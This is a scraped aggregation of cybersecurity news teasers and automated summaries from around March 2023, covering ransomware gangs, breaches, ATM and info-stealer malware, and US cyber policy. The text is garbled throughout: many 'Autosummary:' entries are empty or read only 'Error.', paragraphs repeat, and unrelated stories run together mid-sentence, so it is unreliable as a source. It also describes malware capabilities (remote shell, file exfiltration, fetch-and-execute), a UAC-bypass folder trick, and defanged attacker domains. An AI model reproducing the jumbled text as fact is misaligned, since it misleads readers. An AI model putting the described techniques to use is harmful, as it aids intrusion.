Radiology, endoscopic tests, radiological scans, dialysis, and outpatient pharmacy services will continue operating normally. "Taiwanese multinational hardware and electronics corporation Acer discloses a data breach after a threat actor claimed the hack of the company. Recently a threat actor announced the availability for sale of 160 GB of data allegedly stolen from the Taiwanese multinational hardware and electronics corporation Acer. The threat actor announced the hack on a popular cybercrime forum, he claims […]
The post Acer discloses a new data breach, 160 GB of sensitive data available for sale appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Swollen Emotet DLL to evade detection Source: BleepingComputer Once running, the malware will run in the background, awaiting commands, which will likely install further payloads on the device The payloads allow other threat actors to remotely access the device, which is then used to spread further in the compromised network. Macros disabled by default in Microsoft Office Source: BleepingComputer ANALYGENCE senior vulnerability analyst, Will Dormann, told BleepingComputer that this change also affects attachments saved from emails. "Categories: News Categories: Ransomware Tags: Europol Tags: FBI Tags: police Tags: arrests Tags: DoppelPaymer Tags: Emotet Tags: Dridex In cooperation with the FBI, European police agencies have made arrests that disrupt the DoppelPaymer ransomware operation |
The post DoppelPaymer ransomware group disrupted by FBI and European police agencies appeared first on Malwarebytes Labs.
"Autosummary:
Other victims attacked by DoppelPaymer in the past, include Compal, PEMEX (Petróleos Mexicanos), the City of Torrance in California, Newcastle University, Hall County in Georgia, Banijay Group SAS, and Bretagne Télécom.On 28 February 2023, the German Regional Police and the Ukrainian National Police, with support from Europol, the Dutch Police, and the United States Federal Bureau of Investigations (FBI), apprehended two suspects and seized equipment to determine the suspect’s exact role in the structure of the ransomware group. "Categories: News Categories: Ransomware Tags: Play ransomware Tags: ransomware Tags: City of Oakland Tags: Oakland California After claiming responsibility for attacking the City of Oakland, California, the Play ransomware gang has begun leaking the data it stole. |
The post Play ransomware gang leaks City of Oakland data appeared first on Malwarebytes Labs.
"Autosummary:
Play ransomware gang’s leak page for the City of Oakland, California Following the release of the data, the City of Oakland said in an updated statement: "While the investigation into the scope of the incident impacting the City of Oakland remains ongoing, we recently became aware that an unauthorized third party has acquired certain files from our network and intends to release the information publicly.Posted: March 7, 2023 by After claiming responsibility for attacking the City of Oakland, California, the Play ransomware gang has begun leaking the data it stole. "Categories: News Categories: Ransomware Tags: CISA Tags: Royal Tags: ransomware Tags: phishing Tags: RDP Tags: public facing applications In a Cybersecurity Advisory, CISA and the FBI have shared information about Royal ransomware, which despite being rather new has made a real name for itself. |
The post Warning issued over Royal ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Other methods that are used to gain initial access to victim networks are: Phishing, by using emails containing malicious PDF documents, and malvertising Remote Desktop Protocol (RDP), by using compromised or brute forcing login credentials Exploiting public-facing applications.Posted: March 7, 2023 by In a Cybersecurity Advisory, CISA and the FBI have shared information about Royal ransomware, which despite being rather new has made a real name for itself. "Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer, that since November 2022 was employed in attacks aimed at critical government infrastructure employees, manufacturing companies, and other sectors. The experts found similarities between the SYS01 stealer and another […]
The post SYS01 stealer targets critical government infrastructure appeared first on Security Affairs.
"Autosummary:
The malware also steals information from the victim’s personal Facebook account, including name, email address, date of birth, and user ID, along with other data such as 2FA codes, user agents, IP address, and geolocation The malware is also able to upload files from the infected system to the C2 server and execute commands sent by the C&C. "Autosummary:
"Autosummary:
"Autosummary:
Commands supported by Soul (Check Point) Check Point did not sample additional modules that might perform more specialized functions such as file actions, data exfiltration, keylogging, screenshot capturing, etc. "In today’s digital age, cybersecurity and privacy have become major concerns for internet users. With the increase in cyber attacks and data breaches, it is vital to protect your online privacy and security. One way to do this is by using add-ons for your web browser that can help enhance your security and privacy. Firefox is one of the most popular web browsers, and it offers a variety of add-ons that can help you stay … More
The post 6 cybersecurity and privacy Firefox add-ons you need to know about appeared first on Help Net Security.
"Autosummary:
Temporary Containers With Temporary Containers, you can open disposable containers that isolate attached data and are deleted after usage: Fully automatic, based on navigation-target, for certain websites, with configured mouse clicks on links or just by using the toolbar icon. "Recently, Claroty released its State of XIoT Security Report, which shares analyses of publicly disclosed vulnerabilities affecting operational technology (OT), internet of things (IoT) devices, and most recently, the internet of medical things (IoMT). In this Help Net Security video, Nadav Erez, VP of Data at Claroty, discuss these findings and the critical need to understand the XIoT risk and vulnerability landscape. Some of the dominant trends include: 73% of vulnerabilities uncovered are critical or … More
The post XIoT risk and the vulnerability landscape appeared first on Help Net Security.
"Autosummary:
"92% of the most popular banking and financial services apps contain easy-to-extract secrets and vulnerabilities that can let attackers steal consumer data and finances, according to Approov. The Approov Mobile Threat Lab downloaded, decoded and scanned the top 200 financial services apps in the U.S., U.K., France and Germany from the Google Play Store, investigating a total of 650 unique apps. 92% of the apps leaked valuable, exploitable secrets and 23% of the apps leaked … More
The post Popular fintech apps expose valuable, exploitable secrets appeared first on Help Net Security.
"Autosummary:
"A PoC exploit for CVE-2023-21716, a critical RCE vulnerability in Microsoft Word that can be exploited when the user previews a specially crafted RTF document, is now publicly available. Patches for the flaw – which affects a wide variety of MS Office and SharePoint versions, Microsoft 365 Apps for Enterprise and other products – have been released by Microsoft last month. CVE-2023-21716 and the PoC exploit CVE-2023-21716 was discovered and privately disclosed by security researcher … More
The post PoC exploit for recently patched Microsoft Word RCE is public (CVE-2023-21716) appeared first on Help Net Security.
"Autosummary:
"Fintech platform Hatch Bank disclosed a data breach, hackers exploited a recently discovered zero-day in Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a fintech firm that provides services to other fintech companies. The company disclosed a data breach and revealed that the attackers have exploited a recently discovered zero-day vulnerability in the company’s […]
The post Hatch Bank data breach caused by the exploitation of the GoAnywhere MFT zero-day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hatch Bank) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
2022 in numbers Parameter H1 2022 H2 2022 2022 Percentage of attacked ICS computers globally 31.8% 34.3% 40.6% Main threat sources Internet 16.5% 19.9% 24.0% Email clients 7.0% 6.4% 7.9% Removable devices 3.5% 3.8% 5.2% Network folders 0.6% 0.6% 0.8% Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 12.9% 13.5% 17.3% Denylisted internet resources 9.5% 10.1% 13.2% Spy Trojans, backdoors and keyloggers 8.6% 7.1% 9.2% Malicious documents (MSOffice+PDF) 5.5% 4.5% 6.2% Worms 2.8% 2.5% 3.5% Viruses 2.4% 2.4% 3.2% Miners – executable files for Windows 2.3% 1.5% 2.7% Web miners running in browsers 1.8% 1.8% 2.5% Malware for AutoCAD 0.6% 0.6% 0.8% Ransomware 0.6% 0.4% 0.7% Russia, H2 2022 In H2 2022, the most significant change among all countries in the percentage of ICS computers on which malicious objects were blocked was observed in Russia, where that percentage increased by 9 p.p.In H2 2022, the percentage of ICS computers on which malicious scripts and phishing pages were blocked increased: in Belarus, by 10.3 p.p., yielding 17.8% in H2 2022; in Kyrgyzstan, by 16.4 p.p., yielding 26.4% in H2 2022; in Uzbekistan, by 7.8 p.p., yielding 15.6% in H2 2022; in Kazakhstan, by 6.1 p.p., yielding 14.1% in H2 2022. Percentage of ICS computers on which malicious objects were blocked, January – December 2022 In different regions of the world, the percentage of ICS computers on which malicious activity was prevented ranged from 40.1% in Africa and Central Asia, which led the ranking, to 14.2% and 14.3%, respectively, in Western and Northern Europe, which were the most secure regions. 15 countries and territories with the highest percentage of ICS computers on which malware was blocked when removable devices were connected, H2 2022 Email clients Southern Europe, which, in H1 2022, topped the ranking of regions based on the percentage of ICS computers on which malicious email attachments and phishing links were blocked, remained at the top of the ranking in H2. Percentage of ICS computers on which malicious objects from different sources were blocked, Q1 – Q4 2022 Percentage of ICS computers on which malicious objects from email were blocked, January – December 2022 There was also a noticeable increase in Q2 2022 in the percentage of ICS computers on which threats were blocked in network folders.This group includes Windows computers that perform one or several of the following functions: Supervisory control and data acquisition (SCADA) servers; Data storage servers (Historian); Data gateways (OPC); Stationary workstations of engineers and operators; Mobile workstations of engineers and operators; Human Machine Interface (HMI); Computers used for industrial network administration; Computers used to develop software for industrial automation.Percentage of ICS computers on which malicious objects were blocked, January – December of 2021 and 2022 The increase in the percentage of ICS computers in Russia on which malicious objects were blocked in H2 2022 was due to a sharp increase of 11.1 p.p. in the percentage of ICS computers on which malicious scripts and phishing pages were blocked.Percentage of ICS computers on which denylisted internet resources, as well as malicious scripts and phishing pages were blocked, January – December 2022 The sudden surge in the percentage of ICS computers on which malicious scripts and phishing pages were blocked in August and September 2022, as well as the high figures in the following months, were due to mass infections of websites (including those of industrial organizations) that use the Bitrix CMS.Percentage of ICS computers on which malicious objects from different sources were blocked In H2 2022 in Russia, most industries saw an increase (in some cases, quite significant) in the percentage of ICS computers on which malicious objects were blocked – both as a consequence of mass distribution of malicious scripts and due to a relatively small increase in the percentage of ICS computers in Russia on which spyware was blocked. "Autosummary:
Black Lotus Labs’ reverse engineer analysis revealed the following malware features: config – load new configuration from the C2 – load new configuration from the C2 shell – spawn a remote shell on the infected device – spawn a remote shell on the infected device file – read, delete, or exfiltrate files to the C2 – read, delete, or exfiltrate files to the C2 executor – fetch and execute a file from the C2 – fetch and execute a file from the C2 script – execute a script from the C2 – execute a script from the C2 tcp_forward – transmit any TCP data set to the host’s listening port to a forwarding location – transmit any TCP data set to the host’s listening port to a forwarding location socks5 – set up a SOCKS v5 proxy on the breached router – set up a SOCKS v5 proxy on the breached router quit – stop the malware execution The purpose of the SOCKS proxy is to forward data from other infected machines through the breached router, obfuscating network traffic and mimicking legitimate behavior. "Autosummary:
DoppelPaymer attack rate drops source: ID-Ransomware Among DoppelPaymer"s high-profile victims are Kia Motors America, the Delaware County in Pennsylvania (paid a $500,000 ransom), laptop maker Compal, the Newcastle University (files leaked), electronics giant Foxconn, and the Dutch Research Council (NWO). "In a joint effort, the German Regional Police, Ukrainian National Police, Europol, Dutch Police, and FBI joined forces on February 28, 2023, to take down the masterminds behind a notorious criminal organization responsible for unleashing devastating cyberattacks using the DoppelPaymer ransomware. This ransomware appeared in 2019, when cybercriminals started using it to launch attacks against organizations, critical infrastructure, and industries. Based on the BitPaymer ransomware and part of the Dridex malware family, DoppelPaymer used a … More
The post Law enforcement teams score major win against DoppelPaymer ransomware gang appeared first on Help Net Security.
"Autosummary:
In a joint effort, the German Regional Police, Ukrainian National Police, Europol, Dutch Police, and FBI joined forces on February 28, 2023, to take down the masterminds behind a notorious criminal organization responsible for unleashing devastating cyberattacks using the DoppelPaymer ransomware. "Autosummary:
Error. "Autosummary:
Error. "The US government urges cyber security audits of public water systems, highlighting the importance to secure US critical infrastructure. The Biden administration announced on Friday that it will make it mandatory for the states to conduct cyber security audits of public water systems. Water systems are critical infrastructures that are increasingly exposed to the risk […]
The post US government orders States to conduct cyber security audits of public water systems appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, public water systems) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “Cyberattacks against critical infrastructure facilities, including drinking water systems, are increasing, and public water systems are vulnerable,” said EPA Assistant Administrator Radhika Fox, as reported by the Associated Press. "Autosummary:
"Autosummary:
The Sandbox is a blockchain-based open-world multiplayer game with over 350,000 active monthly users, offering them ways to build, own, and monetize interactive content like virtual worlds, items, and experiences. "German police announced to have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with help of the US FBI and the Dutch police, targeted two key figures of the DoppelPaymer ransomware group. “On 28 February 2023, the German […]
The post European police dismantled the DoppelPaymer ransomware gang appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, DoppelPaymer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
A mock directory would look like "C:\Windows \System32", with an extra space after C:\Windows\. The problem is that some Windows programs, like File Explorer, treat "C:\Windows" and "C:\Windows " as the same folder, thus tricking the operating system into thinking C:\Windows \System32 is a trusted folder and should have its files auto-elevate without a UAC prompt. "Autosummary:
Tweet-sized PoC Security researcher Joshua Drake last year discovered the vulnerability in Microsoft Office’s “wwlib.dll” and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable. "Autosummary:
Black Lotus Labs’ reverse engineer analysis revealed the following malware features: config – load new configuration from the C2 – load new configuration from the C2 shell – spawn a remote shell on the infected device – spawn a remote shell on the infected device file – read, delete, or exfiltrate files to the C2 – read, delete, or exfiltrate files to the C2 executor – fetch and execute a file from the C2 – fetch and execute a file from the C2 script – execute a script from the C2 – execute a script from the C2 tcp_forward – transmit any TCP data set to the host’s listening port to a forwarding location – transmit any TCP data set to the host’s listening port to a forwarding location socks5 – set up a SOCKS v5 proxy on the breached router – set up a SOCKS v5 proxy on the breached router quit – stop the malware execution The purpose of the SOCKS proxy is to forward data from other infected machines through the breached router, obfuscating network traffic and mimicking legitimate behavior. "Resecurity accelerates Digital Forensics & Incident Response Services portfolio with the newly appointed industry professional, Akash Rosen. Akash Rosen is a recognized digital forensics expert and investigator. He assisted international law enforcement on numerous cases related to online-banking theft, financial and healthcare fraud, money laundering, malicious code distribution, and network intrusions into enterprise and government networks. Mr. Rosen is an expert court witness and have testified on numerous digital forensics and cybercrime investigation matters. He … More
The post Resecurity appoints Akash Rosen to lead digital forensics practice appeared first on Help Net Security.
"Autosummary:
"Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city. The attack crippled the center’s computer system, 150 nonurgent operations and up to […]
The post Ransom House ransomware attack hit Hospital Clinic de Barcelona appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Categories: News Tags: whitehouse Tags: biden Tags: national cybersecurity document Tags: federal Tags: government Tags: data Tags: privacy Tags: security The US Government has been working on the National Cybersecurity Strategy Document 2023 for some time now, and it’s finally been released. |
The post National Cybersecurity Strategy Document: What you need to know appeared first on Malwarebytes Labs.
"Autosummary:
As per the WSJ, the five primary areas for action are: Defending critical infrastructure Disruption and dismantling of criminal gangs Shape market forces Investing in a resilient future Forge international partnerships One large part of this new strategy is that organisations potentially most well equipped to fend off attacks must step up and do more: The most capable and best positioned actors in cyberspace must be better stewards of the digital ecosystem...we must ask more [across both the public and private sectors] of the most capable and best positioned actors to make our digital ecosystem more secure and resilient. Update Federal response plans You can expect better processes should you need to contact Federal authorities after a cyber incident, with the aim of creating a “unified, coordinated, whole of government response” with organisations able to quickly and easily find out who to contact, and when. "Categories: Awareness Categories: News Tags: travel Tags: safe Tags: devices Tags: VPN Tags: backups Tags: connections Tags: updates Here are some cybersecurity tips to keep you safe while you travel. |
The post 8 cybersecurity tips to keep you safe when travelling appeared first on Malwarebytes Labs.
"Autosummary:
Avoid sites where you need to login, sites with sensitive info (banking, healthcare, etc.), and especially stay away from making purchases over an unsecured connection.Check if there are updates for your operating system (Windows, Android, iOS, or whatever you’re using), banking apps, and anything else which is privacy sensitive and you use on a daily basis. "Autosummary:
"The Play ransomware gang has finally begun to leak the data stolen from the City of Oakland in a recent attack. The Play ransomware gang has begun to leak data they have stolen from the City of Oakland (California) in a recent cyberattack. Oakland is the largest city in the East Bay region of the […]
The post Play Ransomware gang has begun to leak data stolen from City of Oakland appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, City of Oakland) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
File attachment type blocked in Microsoft OneNote Source: BleepingComputer Some suggested file extensions to block are .js, .exe, .com, .cmd, .scr, .ps1, .vbs, and .lnk. All file attachments are blocked in Microsoft OneNote Source: BleepingComputer A less restrictive option, but potentially more unsafe, is the "Embedded Files Blocked Extensions" group policy, which allows you to input a list of embedded file extensions that will be blocked from opening in a Microsoft OneNote document. "The Trusted Cybersecurity Services (TCS) solution, a hosted intrusion detection service that utilizes classified government threat intelligence to identify and address existing, potential, and emerging cyber threats on an organization’s network, has been introduced by Viasat. The service leverages cyber threat intelligence provided by the U.S. Department of Homeland Security (DHS) through the Cybersecurity and Infrastructure Agency (CISA) Enhanced Cybersecurity Services (ECS) program to help protect U.S.-based organizations from malicious cyber threats. Viasat is the … More
The post Viasat strengthens network security posture for enterprises with Trusted Cybersecurity Services appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" With this development, FiXS becomes the latest in a long list of malware such as Ploutus, Prilex, SUCEFUL, GreenDispenser, RIPPER, Alice, ATMitch, Skimer, and ATMii that have targeted ATMs to siphon money. "Autosummary:
"Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that was employed in attacks against Mexican banks since February 2023. Researchers at Metabase Q recently spotted a new ATM malware, dubbed FiXS, that is currently targeting Mexican banks. The name comes from the malware’s code name in the binary. The experts have yet to determine […]
The post FiXS, a new ATM malware that is targeting Mexican banks appeared first on Security Affairs.
"Autosummary:
Below is a list of key relevant characteristics of the FiXS ATM malware: It instructs the ATM to dispense money 30 minutes after the last ATM reboot It is hidden inside another not-malicious-looking program It is vendor-agnostic targeting any ATM that supports CEN XFS It interacts with the crooks via external keyboard It waits for the Cassettes to be loaded to start dispensing It contains Russian metadata The ATM Malware is embedded in a dropper, the experts spotted it due to the presence of XFS related strings like. "While there was a reduction in the widespread exploitation of new vulnerabilities in 2022, the risk remains significant as broad and opportunistic attacks continue to pose a threat, according to Rapid7. Deploying exploits Attackers are developing and deploying exploits faster than ever. 56% of the vulnerabilities were exploited within seven days of public disclosure — a 12% rise over 2021 and an 87% rise over 2020. In 2022, the median time to exploitation was just … More
The post Attackers are developing and deploying exploits faster than ever appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"To unleash the power of AI, it’s essential to integrate some human input. The technical term is Reinforcement Learning from Human Feedback (RLHF): a machine-learning technique that uses human feedback to train and improve the accuracy of an AI model. ChatGPT, the most notable example of AI and RLHF working together, took the most innovative AI-based language model available (GPT-3 developed by OpenAI) and paired it with RLHF to optimize it for human interaction. The … More
The post The role of human insight in AI-based cybersecurity appeared first on Help Net Security.
"Autosummary:
If AI-based cybersecurity tools leveraged RLHF, they would be immensely powerful, intuitive, and effective and could improve detection and response times to even the most sophisticated threats.By combining AI and RLHF, teams can better identify potential threats, resulting in up to a 90% reduction in the amount of time needed to identify and react to phishing scams, while also significantly reducing the organization’s risk posture. "Autosummary:
Ransom demands made by Royal vary from $1 million to $11 million, with attacks targeting a variety of critical sectors, including communications, education, healthcare, and manufacturing. "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of the capabilities of the recently emerged Royal ransomware. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars. Unlike other ransomware operations, Royal doesn’t offer Ransomware-as-a-Service, it appears to be a private group without […]
The post The U.S. CISA and FBI warn of Royal ransomware operation appeared first on Security Affairs.
"Autosummary:
The ransomware encrypts the network shares, that are found on the local network and the local drives, with the AES algorithm The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations, tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. "Retailer WH Smith disclosed a data breach following a cyber attack, threat actors had access to access company data. Retailer WH Smith revealed that threat actors have breached its infrastructure and had access to the data of about 12,500 current and former employees. The company immediately launched an investigation into the incident with the help […]
The post Retailer WH Smith discloses data breach after a cyberattack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
In response, the FBI and CISA shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) linked, which would help defenders detect and block attempts to deploy Royal ransomware payloads on their networks. "Autosummary:
City of Oakland listed on Play ransomware site (BleepingComputer) The threat actors claim to have stolen documents containing private, confidential data, financial and government papers, identity documents, passports, personal employee data, and even information allegedly proving human rights violations. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @malwareforme, @DanielGallagher, @Ionut_Ilascu, @fwosar, @struppigel, @Seifreed, @demonslay335, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @FourOctets, @PolarToffee, @billtoulas, @jorntvdw, @serghei, @juanbrodersen, @CISAgov,jgreigj, @Bitdefender, @cyfirma, @jgreigj, and @pcrisk. "Categories: News Categories: Ransomware Tags: Pierce Transit Tags: Tacoma Tags: Washington Tags: LockBit Tags: ransomware The ransomware group LockBit is offering data stolen from a Washington state public transit operator on the dark web. |
The post LockBit ransomware demands $2 million for Pierce Transit data appeared first on Malwarebytes Labs.
"Autosummary:
The ransomware group claims to have stolen contracts, client information, non-disclosure agreements, correspondence, and more, all of which are now on sale. The attack began on February 14, 2023, and required Pierce Transit to implement temporary workarounds, to maintain the service of the transit system which transports around 18,000 people every day. On February 28, the LockBit ransomware group published details of the attack on Pierce Transit, along with a public demand for just shy of $2 million in return for the stolen data. "Autosummary:
"In this Help Net Security video interview, James Edgar, CISO at Fleetcor, discusses what consequences SMBs are most concerned about when it comes to cyberattacks, what technology SMBs are most interested in, and much more.
The post Uncovering the most pressing cybersecurity concerns for SMBs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate, HyperBro, PlugX, and a Linux backdoor dubbed rshell. "Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms were targeted as part of two distinct campaigns aimed at distributing GootLoader and FakeUpdates (aka SocGholish) malware. “The attacks emanated from two separate threat […]
The post Threat actors target law firms with GootLoader and SocGholish malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, law firms) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Customer data is safe “WH Smith PLC has been the target of a cyber security incident which has resulted in illegal access to some company data, including current and former employee data,” reads the company"s cybersecurity notice filed with London’s Stock Exchange. "The National Cybersecurity Strategy was unveiled today by the Biden-Harris Administration. The Strategy recognizes that government must use all tools of national power in a coordinated manner to protect national security, public safety, and economic prosperity. The United States will make its digital ecosystem: Defensible, where cyber defense is overwhelmingly easier, cheaper, and more effective Resilient, where cyber incidents and errors have little widespread or lasting impact. The Administration has already taken steps to secure … More
The post US government puts cybersecurity at forefront with newly announced National Strategy appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The trojan is feature rich and is capable of gathering passwords, terminating applications, taking screenshots, logging keystrokes, opening arbitrary web pages on a browser, executing commands, capturing crypto wallet data, and even snooping on victims via the web camera. "Autosummary:
This likely means that the arrested woman used an "email bombing" service that allows customers to send many emails to a target from different addresses, thus making it challenging for the recipient to contain and manage the atypical denial of service attack. "Autosummary:
"Russia remains a persistent cyber threat as it refines its cyber espionage, attack, influence, and disinformation capabilities to coerce sovereign countries, harbor transnational criminal actors, weaken U.S. alliances and partnerships, and subvert the rules-based international system. "Autosummary:
"Autosummary:
Some Trezor users report receiving SMS messages that warn they may be at risk of losing their mountains of Monero, bags of Bitcoin, and packs of Dogecoin: Trezor Suite has recently endured a security breach, assume all your assets are vulnerable. "Cisco addressed a critical vulnerability, tracked as CVE-2023-20078, impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. Cisco released security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. The flaw, tracked as CVE-2023-20078 (rated 9.8 out of 10), is a command injection issue that resides […]
The post Cisco fixed a critical command injection bug in IP Phone Series appeared first on Security Affairs.
"Autosummary:
“A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 Series Multiplatform Phones, as well as Cisco Unified IP Conference Phone 8831 and Unified IP Phone 7900 Series Phones, could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” reads the advisory. "Autosummary:
The Accellion FTA attacks caused widespread damage, with numerous organizations disclosing related breaches, including Morgan Stanley, Qualys, energy giant Shell, supermarket giant Kroger. "Categories: News Tags: RIG EK Tags: exploit kit Tags: MakeMoney Tags: Internet Explorer Tags: Jerome Segura The RIG Exploit Kit is one of the last major exploit kits that still targets the legacy Internet Explorer browser. |
The post Internet Explorer users still targeted by RIG exploit kit appeared first on Malwarebytes Labs.
"Autosummary:
2020 analysis of malvertising leading to the RIG Exploit Kit We connected some RIG EK activity with the cybercriminal behind the "MakeMoney gate" (a name coined by security researcher @nao_sec) based on the domain makemoneywithus[.]work (188.225.75.54) with the earliest instance of this threat group seen in December 2019 via the gate gettime[.]xyz (185.220.35.26). "Categories: News Tags: DISH network Tags: ransomware Tags: SEC Tags: attack Tags: compromise Tags: outage We take a look at a ransomware outbreak impacting multiple DISH Network services. |
The post Ransomware led to multiple DISH Network outages appeared first on Malwarebytes Labs.
"Autosummary:
Downtime and confusion To give some idea of the scale of the outage, services impacted according to Silicon include some of the below:: Dish.com The Dish Anywhere app Boost Mobile “Other websites and networks” operated and owned by DISH network. Customers are without various services, and the Dish website is still sporting a “Thank you for your patience” message along with the link to a statement which includes the following message: The security of our customers’ data is important to us, and if we learn that information was compromised, we’ll take the appropriate steps and let any impacted customers know. A timeline of ransomware DISH filed an 8-K form, used to inform shareholders of major events, to explain the situation.As a result of this incident, many of our customers are having trouble reaching our service desks, accessing their accounts, and making payments. "2022 was the second-highest year on record for global ransomware attempts, as well as an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall. “The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of … More
The post Covert cyberattacks on the rise as attackers shift tactics for maximum impact appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" "This has been largely thanks to GootLoader, SocGholish, SolarMarker, and recent campaigns leveraging Google Ads to float top search results." "Autosummary:
"This represents a bit of a "leap" forward, in terms of ease of use, scalability, accessibility, and most importantly, the potential for much more impact in the forms of persistence, evasion, and/or destruction," Eclypsium"s Scott Scheferman noted. "Autosummary:
SysUpdate infection chain (Trend Micro) SysUpdate is a feature-rich remote access tool allowing a threat actor to perform a variety of malicious behavior as listed below: Service manager (lists, starts, stops, and deletes services) Screenshot grab Process manager (browses and terminates processes) Drive information retrieval File manager (finds, deletes, renames, uploads, downloads a file, and browses a directory) Command execution Trend Micro comments that Iron Tiger used a Wazuh-signed executable in later sideloading stages to blend with the victim"s environment, as the target organization used the legitimate Wazuh platform. "Autosummary:
"Autosummary:
Organizations must have a strong culture of security and a first step to strengthening cybersecurity awareness, is setting up training programs specifically for phishing messages that invoke fear or a sense of urgency, unexpected invoices, and requests to establish a phone call or install software. What is clear, and as ProofPoint illustrates in their report, is that developing a strong culture of cybersecurity is the most effective defence against personalized attacks, such as callback phishing. "Satellite TV giant Dish Network has confirmed that the recent outage was caused by a ransomware attack, it also disclosed a data breach. Satellite TV giant Dish Network finally admitted that the recent outage was caused by a ransomware attack. The American satellite broadcast provider went offline on February 24, 2023, the outage impacted Dish.com, […]
The post Satellite TV giant Dish admitted that the recent outage was caused by a ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Dish) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The banned services mentioned by Roskomnadzor include the following: Discord – Game-focused VoIP and instant messaging social platform based in San Francisco, U.S. – Game-focused VoIP and instant messaging social platform based in San Francisco, U.S. Microsoft Teams – American business communication platform. "The Canadian government announced it will ban the video app TikTok from all government-issued devices over security concerns. Canada is going to ban the popular Chinese video-sharing app TikTok from the mobile devices of its employees over security concerns. The app will be removed from government devices this week. The app “presents an unacceptable level […]
The post Canada is going to ban TikTok on government mobile devices appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Canada) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Landing page for Trezor phishing site Source: Urlscan When users click the "Start" button, they will ultimately be prompted to enter their recovery seed, which the threat actors will then steal. When setting up a new Trezor wallet, users are given a 12 or 24-word recovery seed that can be used to recover a wallet if a device is stolen, lost, or malfunctions. "Categories: News Tags: AI Tags: voice Tags: generated Tags: synthetic Tags: bank Tags: banking Tags: telephone Tags: login Tags: account Now that we have freely available artificial intelligence happily replicating people’s voices, could it be a security risk? |
The post AI voice cracks telephone banking voice recognition appeared first on Malwarebytes Labs.
"Autosummary:
Voice, fingerprint, face, and iris recognition all rely on a judgement of similarity, which creates opportunities for enterprising criminals who can produce realistic facsimiles. "Autosummary:
"Cyber attack risks faced by businesses across states and reported data breaches are relative to the respective state governments’ cybersecurity investment, according to Network Assured. Study methodology Network Assured compared data from State Attorneys Generals and the Department of Health and Human Services (HHS) Centers for Medicare and Medicaid Services (CMS) Office of Civil Rights’ (OCR), along with public reporting of state budgets for cybersecurity. The study also compared data breach statistics with the number … More
The post 10 US states that suffered the most devastating data breaches in 2022 appeared first on Help Net Security.
"Autosummary:
